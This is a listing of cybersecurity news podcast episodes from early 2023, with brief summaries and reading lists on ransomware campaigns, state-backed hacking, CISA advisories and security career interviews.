    Wendy talks through some of the key findings based off of the report, and after surveying 4,751 active information security and privacy professionals from 26 countries, we find out some of the top priorities to achieving security resilience. From there the research goes on to explain from the findings which data-backed practices lead to the outcomes that can be implemented in cybersecurity strategies.

    The research can be found here:

    • Cracking the Code to Security Resilience: Lessons from the Latest Cisco Security Outcomes Report
    • Achieving Security Resilience

    FBI investigates a network incident. Developments in cybercrime. DDoS against German airports. US forms a Disruptive Technology Strike Force. CISA releases 15 ICS advisories. Feb 17, 2023

    The FBI is investigating incidents on its networks. Frebniis backdoors Microsoft servers. ProxyShell vulnerabilities are used to install a cryptominer. Havoc's post-exploitation framework. Atlassian discloses a data breach. German airports sustain a cyber incident. An Aspen Institute report concludes that cyber assistance benefits Ukraine. US announces "Disruptive Technology Strike Force." Robert M. Lee from Dragos on the value of capture the flag events. Our guests are Commander Brandon Campbell of US Navy Cyber Defense Operations Command and Captain Steve Correia, Commanding Officer of Naval Network Warfare Command. And CISA releases fifteen ICS advisories.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/33


    Selected reading.

    Exclusive: FBI says it has 'contained' cyber incident on bureau's computer network (CNN)

    Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor (Symantec, by Broadcom Software)

    ProxyShellMiner Campaign Creating Dangerous Backdoors (Morphisec)

    Attacks with novel Havoc post-exploitation framework identified (SC Media)

    Atlassian says recent data leak stems from third-party vendor hack (BleepingComputer)

    German airport websites down in possible hacker attack (Deutsche Welle)

    The Cyber Defense Assistance Imperative – Lessons from Ukraine (Aspen Institute)

    U.S. launches 'disruptive technology' strike force to target national security threats (Reuters)

    Justice Department to Increase Scrutiny of Technology Exports, Investments (Wall Street Journal)

    ICS-CERT Advisories (CISA)


    APT37 has some new tricks. Multilingual BEC attacks. A look at the cyber phases of Russia’s war, and how being a crime victim may now be another way of serving the state. Influencers behaving badly. Feb 16, 2023

    North Korea's APT37 is distributing M2RAT. Multilingual BEC attacks, and how they happen. Assessing the cyber phase of Russia's war as the first anniversary of the invasion approaches. Killnet's attempt to rally hacktivists and criminals to the cause of Russia. Dinah Davis from Arctic Wolf describes continuous network scanning. Our guest is Dr. Inka Karppinen of CybSafe with a look at cyber security through the lens of a behavioral psychologist. And Grand Theft Auto is now also a TikTok challenge.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/32


    Selected reading.

    RedEyes hackers use new malware to steal data from Windows, phones (BleepingComputer)

    Multilingual Executive Impersonation Attacks (Abnormal Intelligence)

    Fog of War: How the Ukraine Conflict Transformed the Cyber Threat Landscape (Google Threat Analysis Group)

    Following the Money: Killnet’s ‘Infinity Forum’ Wooing Likeminded Cybercriminals (Flashpoint)

    Hyundai, Kia patch bug allowing car thefts with a USB cable (BleepingComputer)

    Hyundai and Kia Launch Service Campaign to Prevent Theft of Millions of Vehicles Targeted by Social Media Challenge (NHTSA)


    A look at the SideWinder APT. GoAnywhere vulnerability exploited in the wild. Ransomware rampant. Hacktivism in Russia’s hybrid war. Patch Tuesday notes. Feb 15, 2023

    SideWinder is an APT with possible origins in India. MortalKombat ransomware debuts. The GoAnywhere zero day was exploited in a data breach. Belarusian Cyber-Partisans release Russian data. Betsy Carmelite from Booz Allen Hamilton shares an overview of cyber deception. Our guest is Ashley Allocca from Flashpoint with a look at the Breaches and Malware Threat Landscape. And notes on Patch Tuesday.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/31


    Selected reading.

    Molted skin: APT SideWinder 2021 campaign that targeted over 60 companies in the Asia-Pacific (Group-IB)

    New MortalKombat ransomware and Laplas Clipper malware threats deployed in financially motivated campaign (Cisco Talos Blog)

    Tonga is the latest Pacific Island nation hit with ransomware (The Record from Recorded Future News)

    LockBit demanded £66mn from Royal Mail (Computing)

    City of Oakland declares state of emergency after ransomware attack (BleepingComputer)

    City of Oakland Targeted by Ransomware Attack, Work Continues to Secure and Restore Services Safely (City of Oakland)

    Huge data dump from Russia’s censorship agency posted online (Cybersecurity Connect)

    Russian system to scan internet for undesired content and dissent (Reuters)

    Patch Tuesday: Three zero-days and nine 'Critical' RCE flaws fixed (Computing)

    Microsoft February 2023 Patch Tuesday fixes 3 exploited zero-days, 77 flaws (BleepingComputer)

    Apple Releases Security Updates for Multiple Products (CISA)

    SAP Security Patch Day for February 2023 (Onapsis)

    Citrix Releases Security Updates for Workspace Apps, Virtual Apps and Desktops (CISA)

    Adobe Releases Security Updates for Multiple Products (CISA)

    The first national cyber director's last day is today (Washington Post)


    Blender is back, but now DBA Sinbad (still working for the Lazarus Group). Cyberespionage notes. Hacktivism. ICS threats. Valentine’s Day scams. Feb 14, 2023

    "Blender" reappears as "Sinbad." A Tonto Team cyberespionage attempt against Group-IB is thwarted. DarkBit claims responsibility for a ransomware attack on Technion University. An overview of ICS and OT security. Ben Yelin looks at surveillance oversight at the state level. Ann Johnson from Afternoon Cyber Tea speaks with Marene Allison about the CISO transformation. And it’s Valentine's Day, that annual holiday of love, chocolate, flowers, and online scams.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/30


    Selected reading.

    Has a Sanctioned Bitcoin Mixer Been Resurrected to Aid North Korea’s Lazarus Group? (Elliptic Connect)

    Nice Try Tonto Team (Group-IB)

    Hackers attack Israel’s Technion University, demand over $1.7 million in ransom (ARN)

    Israel's top tech university postpones exams after ransomware attack (The Record from Recorded Future News)

    Russian hackers ‘disrupt Turkey-Syria earthquake aid’ in cyber attack on Nato (The Independent)

    Killnet DDoS attacks disrupt Nato websites (ComputerWeekly.com)

    Russian Hackers Disrupt NATO Earthquake Relief Operations (Dark Reading)

    What Happened to #OpRussia? (Dark Reading)

    Russian-linked malware was close to putting U.S. electric, gas facilities ‘offline’ last year (POLITICO)

    2022 ICS/OT Cybersecurity Year in Review Executive Summary (Dragos)

    What’s love got to do with it? 4 in 5 Valentine’s Day-themed spam emails are scams, Bitdefender Antispam Lab warns (Hot for Security)


    Known Exploited Vulnerabilities. Fool’s gold. Hacktivists come in both dissident and loyal varieties. Naming and shaming the shameless. Feb 13, 2023

    CISA adds to its Known Exploited Vulnerabilities Catalog. Cl0p claims responsibility for GoAnywhere exploitation. Victims mine for gold; attackers use pig butchering tactics. Hacktivists disrupt Iranian television during Revolution Day observances. Killnet claims a DDoS attack against NATO earthquake relief efforts. CyberWire UK Correspondent Carole Theriault asks what we can learn from the recent Roomba privacy snafu. Rick Howard looks at first principles we considered along the way. And can you name and shame the shameless?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/29


    Selected reading.

    CISA Adds Three Known Exploited Vulnerabilities to Catalog (CISA)

    GoAnywhere MFT Zero-Day Exploitation Linked to Ransomware Attacks (SecurityWeek)

    Clop ransomware claims it breached 130 orgs using GoAnywhere zero-day (BleepingComputer)

    Fool’s Gold: dissecting a fake gold market pig-butchering scam (Sophos)

    Iranian State TV Hacked During President's Speech on Revolution Day (HackRead)

    Russian hackers disrupt Turkey-Syria earthquake relief (The Telegraph)

    Hacking marketplace emerges from Killnet partnership, seeks pro-Russia donations (SC Media)

    Russian Government evaluates the immunity to hackers acting in the interests of Russia (Security Affairs)

    Russia’s Ransomware Gangs Are Being Named and Shamed (WIRED)


    Jaden Dicks: It is never too early to start. [CyberVista intern] [Career Notes] Feb 12, 2023

    Jaden Dicks, a new intern at CyberVista, a company that merged with CyberWire to become N2K Networks, shares his story as a young man growing up trying to get into the cyber community. From a very young age, Jaden hoped to become part of the cybersecurity field. He recalls growing up constantly surrounded by technology, and now, with the help of Urban Alliance, Jaden was able to secure this internship with CyberVista. Urban Alliance is a nonprofit that connects young adults with paid work experiences, such as internships, to help them bridge the gaps between education and the workforce. Jaden hopes that this internship will help him further advance his career and pursue his goal of working in cyber. He also shares advice for younger people like him who are looking to branch out and start working toward their goals, even as a teenager, and what has helped him to find his rhythm. We thank Jaden for sharing his story with us.


    Knocking down the legs of the industrial security triad. [Research Saturday] Feb 11, 2023

    Pascal Ackerman, OT Security Strategist from Guidepoint Security, joins Dave to discuss his work on discovering a vulnerability in the integrity of a common HMI client-server protocol. This research is a Proof of Concept (PoC) attack on the integrity of data flowing across the industrial network, with the intention of intercepting, viewing, and even manipulating values sent to (and from) the HMI, trying to trick the user into making a wrong decision and ultimately affecting the proper operation of the process.

    In this research, they are targeting Rockwell Automation’s FactoryTalk View SE products, trying to highlight the lack of integrity and confidentiality on the production network and the effect that has on the overall security of the production environment.

    The research can be found here:

    • GuidePoint Security researcher discovers vulnerability in the integrity of common HMI client-server protocol

    US, RoK agencies outline DPRK ransomware. Reddit breached. ICS and IIoT issues. It’s almost Valentine’s Day. Have you noticed? (The hoods have.) Feb 10, 2023

    US and Republic of Korea agencies outline the DPRK ransomware threat. Reddit is breached. CISA releases six ICS advisories. Flaws are found in IIoT devices. Dinah Davis from Arctic Wolf shares cybersecurity stats every IT professional should know. Our guest is Kayla Williams from Devo autonomous SOCs. And, it’s almost Valentine’s Day. Have you noticed? (The hoods have.)


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/28


    Selected reading.

    #StopRansomware - Ransomware Attacks on Critical Infrastructure Fund DPRK Espionage Activities (CISA)

    #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities (CISA)

    U.S., South Korean Agencies Partner to #StopRansomware Threat from DPRK (National Security Agency/Central Security Service)

    US and South Korea accuse North Korea of using hospital ransoms to fund more hacking (The Record from Recorded Future News)

    North Korea using healthcare ransomware attacks to fund further cybercrime, feds say (SC Media)

    U.S., South Korea Warn of North Korean Ransomware Threats (Bank Info Security)

    r/reddit - We had a security incident. Here’s what we know. (reddit)

    Hackers breach Reddit to steal source code and internal data (BleepingComputer)

    Reddit Breached With Stolen Employee Credentials (Dark Reading)

    Reddit Says It Was Hacked But That You Don't Need to Worry. Probably. (Gizmodo)

    Control By Web X-400, X-600M (CISA)

    LS ELECTRIC XBC-DN32U (CISA)

    Johnson Controls System Configuration Tool (SCT) (CISA)

    Horner Automation Cscape Envision RV (CISA)

    Omron SYSMAC CS/CJ/CP Series and NJ/NX Series (CISA)

    ARC Informatique PcVue (CISA)

    Industrial Wireless IoT - The direct path to your Level 0 (Otorio)

    Critical Infrastructure at Risk from New Vulnerabilities Found in Wireless IIoT Devices (The Hacker News)

    Romance scammers’ favorite lies exposed (Federal Trade Commission)

    New FTC Data Reveals Top Lies Told by Romance Scammers (Federal Trade Commission)

    Romance scammers could cause unhappy Valentine’s Day (Washington Post)

    Love Bytes (Georgia State News Hub)

    As V-Day nears: Romance scams cost victims $1.3B last year (Register)

    Michigan AG warns of cybersecurity risks after data breach of gaming sites (mlive)


    CISA Alert AA23-040A – #StopRansomware: ransomware attacks on critical infrastructure fund DPRK malicious cyber activities. [CISA Cybersecurity Alerts] Feb 10, 2023

    CISA, NSA, FBI, the US Department of Health and Human Services, the Republic of Korea National Intelligence Service, and the Republic of Korea Defense Security Agency are issuing this alert to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.

    AA23-040A Alert, Technical Details, and Mitigations

    CISA’s North Korea Cyber Threat Overview and Advisories webpage.

    Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link: https://www.stairwell.com/news/threat-research-report-maui-ransomware/

    See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Cyberespionage, from war floating to phishing. An update on ESXiArgs. Fresh sanctions against ransomware operators, and more takedowns may be in the offing. Feb 09, 2023

    War-floating. A phishing campaign pursues Ukrainian and Polish targets. Pakistan's navy is under cyberattack. A new criminal threat actor uses screenshots for recon. ESXiArgs is widespread, but its effects are still being assessed. The UK and US issue joint sanctions against Russian ransomware operators. Robert M. Lee from Dragos addresses attacks on electrical substations. Our guest is Denny LeCompte from Portnox discussing IoT security segmentation strategies. And is LockBit next on law enforcement’s wanted list?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/27


    Selected reading.

    Chinese Balloon Had Tools to Collect Communications Signals, U.S. Says (New York Times)

    UAC-0114 Campaign Targeting Ukrainian and Polish Gov Entities (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

    NewsPenguin, a Previously Unknown Threat Actor, Targets Pakistan with Advanced Espionage Tool (BlackBerry)

    Screentime: Sometimes It Feels Like Somebody's Watching Me (Proofpoint)

    Florida state court system, US, EU universities hit by ransomware outbreak (Reuters)

    No evidence global ransomware hack was by state entity, Italy says (Reuters)

    Ransomware campaign stirs worry despite uncertain impact (Washington Post)

    VMware Security Response Center (vSRC) Response to 'ESXiArgs' Ransomware Attacks (VMware Security Blog)

    CISA and FBI Release ESXiArgs Ransomware Recovery Guidance (CISA)

    United States and United Kingdom Sanction Members of Russia-Based Trickbot Cybercrime Gang (U.S. Department of the Treasury)

    Ransomware criminals sanctioned in joint UK/US crackdown on international cyber crime (National Crime Agency)


    CISA Alert AA23-039A – ESXiArgs ransomware virtual machine recovery guidance. [CISA Cybersecurity Alerts] Feb 09, 2023

    CISA and the FBI are releasing this alert in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors are exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware.

    AA23-039A Alert, Technical Details, and Mitigations

    CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover

    VMware Security Response Center (vSRC) Response to 'ESXiArgs' Ransomware Attack…

    Enes Sonmez and Ahmet Aykac, YoreGroup Tech Team: decrypt your crypted files in…

    See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    An ICS update from CISA. Ransomware notes: LockBit, Clop, and ESXiArgs. Vulnerability in Toyota’s GSPIMS. Two new Russian cyberespionage efforts hit Ukraine. And a direction for US privacy policy. Feb 08, 2023

    CISA releases an ICS security advisory affecting a smart facility system. LockBit threatens to release Royal Mail data tomorrow. Cl0p ransomware expands to Linux-based systems. A vulnerability is identified in Toyota's GSPIMS. There’s an ESXiArgs update: new trackers and mitigation tools are available. Russia is running two new cyberespionage campaigns against Ukraine. Our guest, Roya Gordon from Nozomi Networks, discusses the ICS threat landscape. And The Washington Post’s Tim Starks provides analysis on last night’s State of the Union.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/26


    Selected reading.

    CISA Releases One Industrial Control Systems Advisory (CISA)

    LockBit group threatens to publish stolen Royal Mail data tomorrow (Computing)

    Cl0p Ransomware Targets Linux Systems with Flawed Encryption | Decryptor Available (SentinelOne)

    Hacking into Toyota’s global supplier management network (Eaton Works)

    Researcher breaches Toyota supplier portal with info on 14,000 partners (BleepingComputer)

    Vulnerability Provided Access to Toyota Supplier Management Network (SecurityWeek)

    CISA Releases ESXiArgs Ransomware Recovery Script (CISA)

    ESXiArgs Ransomware Campaign Targets VMWare ESXi Vulnerability (SecurityScorecard)

    Graphiron: New Russian Information Stealing Malware Deployed Against Ukraine (Symantec)

    Remcos software deployed in spying attempt on Ukraine’s government, CERT says (The Record from Recorded Future News)

    The State of the Union was light on cybersecurity (Washington Post)

    Biden calls for action on privacy rights in State of the Union (CyberScoop)


    Update: VMware ESXi exploitations. Super Bowl cyber risks. Scalping bots. The curious case of the Moscow billboards. Feb 07, 2023

    VMware ESXi exploitations. Super Bowl cyber risks. Scalping bots. The curious case of the Moscow billboards. Joe Carrigan tracks pig butchering apps in online app stores. Our guest is David Liebenberg from Cisco Talos, to discuss incident response trends. And, in sportsball, it’s gonna be the Chiefs by a couple of hat tricks, or something.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/25


    Selected reading.

    Ransomware Hits Unpatched VMware Systems: 'Send Money Within 3 Days' (Virtualization Review)

    Massive ransomware attack targets VMware ESXi servers worldwide (CSO Online)

    CISA steps up to help VMware ESXi ransomware victims (SC Media)

    ‘Massive’ new ESXiArgs ransomware campaign has compromised thousands of victims (The Record from Recorded Future News)

    Have you clicked “Report Junk” lately on your #mobile device? (Proofpoint)

    CyRC special report: Secure apps? Don’t bet on it (Synopsys)

    DataDome’s Inaugural E-Commerce Holiday Bot & Online Fraud Report Reveals the US as the Top Source of Bot Attacks (DataDome)

    Darknet drug market BlackSprut openly advertises on billboards in Moscow (The Record from Recorded Future News)


    Unpatched VMware ESXi instances attacked. 0ktapus is back. Update on LockBit’s ransomware attack on ION. Charlie Hebdo hack attributed to Iran. Feb 06, 2023

    New ransomware exploits a VMware ESXi vulnerability. Roasted 0ktapus squads up. LockBit says ION paid the ransom. Russian cyber auxiliaries continue attacks against healthcare organizations. Attribution on the Charlie Hebdo attack. Deepen Desai from Zscaler describes recent activity by Ducktail malware. Rick Howard looks at cyber threat intelligence. And the top US cyber diplomat says his Twitter account was hacked.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/24


    Selected reading.

    Ransomware Gang in Trading Hack Says Ransom Was Paid (Bloomberg)

    Regulators weigh in on ION attack as LockBit takes credit (Register)

    Russian hackers launch attack on City of London infrastructure (The Armchair Trader)

    Ransomware attack on data firm ION could take days to fix -sources (Reuters)

    Linux version of Royal Ransomware targets VMware ESXi servers (BleepingComputer)

    Ransomware scum attack old VMWare ESXi vulnerability (Register)

    Italy sounds alarm on large-scale computer hacking attack (Reuters)

    Italy's TIM suffers internet connection problems (Reuters)

    Italy sounds alarm on large-scale computer hacking attack (Jerusalem Post)

    Italian National Cybersecurity Agency (ACN) warns of massive ransomware campaign targeting VMware ESXi servers (Security Affairs)

    Campagne d’exploitation d’une vulnérabilité affectant VMware ESXi (CERT-FR)

    VMSA-2021-0002 (VMware)

    CERT-FR warns of a new wave of ransomware attacks targeting VMware ESXi servers (Security Affairs)

    ‘0ktapus’ hackers are back and targeting tech and gaming companies, says leaked report (TechCrunch)

    Customizable new DDoS service already appears to have fans among pro-Russia hacking groups (The Record from Recorded Future News)

    Russian Hackers Take Down At Least 17 U.S. Health System Websites (MedCity News)

    Tallahassee Memorial HealthCare, Florida, has taken IT systems offline after cyberattack (Security Affairs)

    Iran responsible for Charlie Hebdo attacks - Microsoft On the Issues (Microsoft On the Issues)

    Piratage de « Charlie Hebdo » : un groupe iranien à la manœuvre, selon Microsoft (Le Monde)

    Iran behind hack of French magazine Charlie Hebdo, Microsoft says (Reuters)

    Microsoft attributes Charlie Hebdo data leak to Iran-linked NEPTUNIUM APT (Security Affairs)

    America's top cyber diplomat says his Twitter account was hacked (CNN)


    “Shift Left”: A case for threat-informed pentesting. [CyberWire-X] Feb 05, 2023

    Penetration testing is a vital part of a robust security program, but the traditional pentesting model is in a rut. Assessments happen infrequently, the scope is often very broad, and the report is usually overwhelming. What if you could increase the overall ROI of your pentesting program and avoid these limitations? Every penetration test should have specific goals. Coverage of the MITRE ATT&CK framework or the OWASP Top Ten is a great start, but a pentest could provide exponential value by applying a more strategic approach.

    In this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner discuss what it means to "shift left" with your penetration testing by working on a threat-informed test plan with guests and Hash Table members Bob Turner, the Field CSO of Fortinet, Etay Maor, the Senior Director for Security Strategy at Cato Networks, and Dan DeCloss, the Founder and CEO of our episode sponsor PlexTrac.


    Yasmin Abdi: Find your community. [Security Engineer] [Career Notes] Feb 05, 2023

    Yasmin Abdi, a Security Engineering Manager at Snapchat and the CEO and Founder of NoHack, sits down to share her story of how she got to be in her amazing current roles. From a young age, Yasmin was fascinated by the overlap of cybersecurity, crime, and law. During college, she was able to intern at big tech companies like Snapchat, Google, and Facebook. She decided to stick with Snapchat, which had the security aspect and security composure that she wanted. In her role at Snapchat, she works with her team to help take down all kinds of bad content and keep up the platform’s integrity, and she found she fell in love with the work along the way. Yasmin shares the sage advice to grow your community as much as you can, saying to "form a community of like-minded people. People that you can bounce ideas off of, people that can help support you when times are low. Find mentors, find people that you aspire to be like, and really find that community of people." We thank Yasmin for sharing her story.


    Can ransomware turn machines against us? [Research Saturday] Feb 04, 2023

    Tom Bonner and Eoin Wickens from HiddenLayer's SAI Team sit down to discuss their research on weaponizing machine learning models with ransomware. Researchers at HiddenLayer’s SAI Team have developed a proof-of-concept attack for surreptitiously deploying malware, such as ransomware or Cobalt Strike Beacon, via machine learning models.

    The attack uses a technique currently undetected by many cybersecurity vendors and can serve as a launchpad for lateral movement, deployment of additional malware, or the theft of highly sensitive data. In this research, the team raises awareness by demonstrating how easily an adversary can deploy malware through a pre-trained ML model.

    The research can be found here:

    • WEAPONIZING MACHINE LEARNING MODELS WITH RANSOMWARE

    Cyberespionage, and ransomware as misdirection. A new Python-based supply chain attack. Traffic on the Static Expressway. KillNet continues to plague hospitals. And Telegram may be compromised. Feb 03, 2023

    CISA has released six ICS Advisories. A look at a North Korean cyberespionage campaign. ChatGPT and its attack potential. A new Python-based supply chain attack. There’s traffic on the Static Expressway: ClickFunnels seen in use for redirection. KillNet continues its campaign against hospitals. Ransomware as misdirection for cyberespionage. Part two of my conversation with Kathleen Smith of ClearedJobs.Net discussing trends in the cleared space. Our guest is Eric Bassier of Quantum talking about the multi-layered approach to ransomware protection. And Russian surveillance extends to Telegram chats.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/23


    Selected reading.

    Delta Electronics DIAScreen (CISA)

    Mitsubishi Electric GOT2000 Series and GT SoftGOT2000 (CISA)

    Baicells Nova (CISA)

    Delta Electronics DVW-W02W2-E2 (CISA)

    Delta Electronics DX-2100-L1-CN (CISA)

    Mitsubishi Electric GT SoftGOT2000 (CISA)

    No Pineapple! –DPRK Targeting of Medical Research and Technology Sector (WithSecure)

    Hackers linked to North Korea targeted Indian medical org, energy sector (The Record from Recorded Future News)

    North Korean hackers stole research data in two-month-long breach (BleepingComputer)

    ChatGPT May Already Be Used in Nation State Cyberattacks, Say IT Decision Makers in BlackBerry Global Research (BlackBerry)

    Supply Chain Attack by New Malicious Python Package, “web3-essential” (Fortinet)

    Leveraging ClickFunnels to Bypass Security Services (Avanan)

    Report: 'KillNet' targeting hospitals in countries helping Ukraine in war efforts (Becker’s Hospital Review)

    Intelligence agency says ransomware group with Russian ties poses 'an enduring threat' to Canada (CBC)

    Les ransomwares, couverture des groupes APT pour du cyber-espionnage (Le Monde Informatique)

    The Kremlin Has Entered the Chat (WIRED)


    Cisco fixes vulnerabilities in ICS appliances. NIST’s anti-phishing guidelines. OneNote exploitation. HeadCrab malware. Recent actions by Russian threat actors. Trends in state-directed cyber ops. Feb 02, 2023

    Cisco patches a command injection vulnerability. NIST issues antiphishing guidance. HeadCrab malware's worldwide distribution campaign. The Gamaredon APT is more interested in collection than destruction. Kathleen Smith of ClearedJobs.Net looks at hiring trends in the cleared community. Bennett from Signifyd describes the fraud ring that’s launched a war on commerce against U.S. merchants. And trends in cyberattacks by state-sponsored actors.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/22


    Selected reading.

    Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover (Dark Reading)

    Phishing Resistance – Protecting the Keys to Your Kingdom (NIST)

    OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK (Proofpoint)

    HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign (Aquasec)

    Another UAC-0010 Story (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

    Russia-backed hacker group Gamaredon attacking Ukraine with info-stealing malware (The Record from Recorded Future News)

    City of London traders hit by Russia-linked cyber attack (The Telegraph)

    ChristianaCare recovers from cyberattack, restores website service (6abc Philadelphia)

    Nation-State Threats and the Rise of Cyber Mercenaries: Exploring the Microsoft Digital Defense Report (CSO Online)

    Microsoft Digital Defense Report 2022 (Microsoft Security)


    How the C2C market sustains ransomware gangs. In Russia’s war, intelligence services deploy wipers, and hacktivist auxiliaries handle the DDoS. And a look into other corners of the cyber underworld. Feb 01, 2023

    Microsoft tallies more than a hundred ransomware gangs. Sandworm's NikoWiper hits Ukraine's energy sector. Mobilizing cybercriminals in a hybrid war. Firebrick Ostrich and business email compromise. Telegram is used for sharing stolen data and selling malware. Crypto scams find their way into app stores. Bryan Vorndran of the FBI Cyber Division outlines the services the FBI provides during an incident response. Ann Johnson from Afternoon Cyber Tea speaks with actor producer Tim Murck about the intersection of cyber awareness and storytelling. And we are shocked - shocked! - that there are fraudulent cyber professional credentials circulating online.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/21


    Selected reading.

    Microsoft: Over 100 threat actors deploy ransomware in attacks (BleepingComputer)

    SocGholish: A Tale of FakeUpdates (Reliaquest)

    ESET APT Activity Report T3 2022 (WeLiveSecurity)

    Pro-Russian DDoS attacks raise alarm in Denmark, U.S. (The Record from Recorded Future News)

    ChristianaCare's website restored after attack; pro-Russia 'hacktivist' group takes credit (Delaware News Journal)

    Univ. of Iowa Hospitals website possibly hit by cyberattack (KCRG)

    Cyber attack causes problems with UM Health websites (The Detroit News)

    How the war in Ukraine has strengthened the Kremlin's ties with cybercriminals (The Record from Recorded Future News)

    Dark Covenant 2.0: Cybercrime, the Russian State, and War in Ukraine (Recorded Future)

    Russia’s cyberwar against Ukraine offers vital lessons for the West (Atlantic Council)

    BEC Group Uses Secondary Personas & Lookalike Domains in Third-Party… (Abnormal Intelligence)

    Telegram's place in the cyber underworld. (CyberWire)

    Crypto scams found in the App Store. (CyberWire)

    Exposure to third-party risk. (CyberWire)

    Cyber certification deceit. (CyberWire)


    The cybercriminal labor market and the campaigns it’s supporting. Russia’s Killnet is running DDoS attacks against US hospitals, but Russia says, hey, it’s the real victim here. Jan 31, 2023

    Some perspective on the cybercriminal labor market. DocuSign is impersonated in a credential-harvesting campaign. Social engineering pursues financial advisors. Killnet is active against the US healthcare sector. Mr. Security Answer Person John Pescatore has thoughts on cryptocurrency. Ben Yelin and I debate the limits of section 230. And, hey, who’s the real victim in cyberspace? A hint: probably not you, Mr. Putin.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/20


    Selected reading.

    Perspectives on the cybercriminal labor market. (CyberWire)

    IT specialists search and recruitment on the dark web (Securelist)

    Cybercrime job ads on the dark web pay up to $20k per month (BleepingComputer)

    Report on hackers' salaries shows poor wages for developers (Register)

    Cybercrime groups offer six-figure salaries, bonuses, paid time off to attract talent on dark web (CyberScoop)

    Application security risks. (CyberWire)

    Survey gives insight into new app security challenges (Cisco App Dynamics)

    DocuSign impersonated in credential phishing attack. (CyberWire)

    Breaking the Impersonation: Armorblox Stops DocuSign Attack (Armorblox)

    "Pig butchering" and financial advisor impersonation scams. (CyberWire)

    No Blocking, No Issue: The Curious Ecosystem of Financial Advisor Impersonation Scams (Domain Tools)

    Ukraine at D+341: Killnet hits US hospitals. (CyberWire)

    HC3 TLP Clear Analyst Note: Pro-Russian Hacktivist Group Threat to HPH Sector (American Hospital Association)

    HHS, AHA Warn of Surge in Russian DDoS Attacks on Hospitals (Gov Info Security)

    Russian hackers allegedly take down Duke University Hospital’s website (Carolina Journal)

    The Evolution of DDoS: Return of the Hacktivist (FS-ISAC)

    Russia becomes target of West’s coordinated aggression in cyberspace — MFA (TASS)


    Criminal evolutions, disgruntled insiders, and gangsta wannabes. New wiper attacks hit Ukrainian targets, with less effect than the first rounds early last year. And support your local hacktivist? Jan 30, 2023

    Gootloader's evolution. Yandex source code leaked (and Yandex blames a rogue insider). New GRU wiper malware is active against Ukraine. Latvia reports cyberattacks by Gamaredon. Russia and the US trade accusations of malign cyber activity. A hacktivist auxiliary's social support system. Deepen Desai from Zscaler describes the Lilithbot malware. Rick Howard looks at chaotic simians. And wannabes can be a nuisance, too: LockBit impersonators are seen operating in northern Europe.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/19


    Selected reading.

    Welcome to Goot Camp: Tracking the Evolution of GOOTLOADER Operations (Mandiant)

    Yandex denies hack, blames source code leak on former employee (BleepingComputer)

    Hackers use new SwiftSlicer wiper to destroy Windows domains (BleepingComputer)

    Sandworm APT targets Ukraine with new SwiftSlicer wiper (Security Affairs)

    Ukraine: Sandworm hackers hit news agency with 5 data wipers (BleepingComputer)

